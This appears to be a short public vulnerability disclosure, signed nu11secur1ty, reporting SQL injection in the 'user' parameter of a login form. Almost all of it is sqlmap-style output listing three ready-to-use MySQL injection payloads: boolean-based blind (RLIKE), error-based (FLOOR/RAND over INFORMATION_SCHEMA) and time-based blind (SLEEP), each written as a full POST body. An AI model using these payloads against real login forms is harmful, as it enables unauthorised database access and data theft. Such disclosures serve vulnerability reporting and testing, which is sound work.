Multiple-SQLi

[nu11secur1ty]

Hello Erick from America, you have a serious problem with the security of your system Erick!
Please fix it, or just terminated this project.
BR

---
Parameter: user (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: user=bqxDgfIK' RLIKE (SELECT (CASE WHEN (8457=8457) THEN 0x627178446766494b ELSE 0x28 END)) AND 'BTvs'='BTvs&password=s9U!o7d!C0&btnlogin=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=bqxDgfIK' AND (SELECT 5004 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(5004=5004,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aQfu'='aQfu&password=s9U!o7d!C0&btnlogin=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=bqxDgfIK' AND (SELECT 8137 FROM (SELECT(SLEEP(7)))nCyy) AND 'vQsi'='vQsi&password=s9U!o7d!C0&btnlogin=
---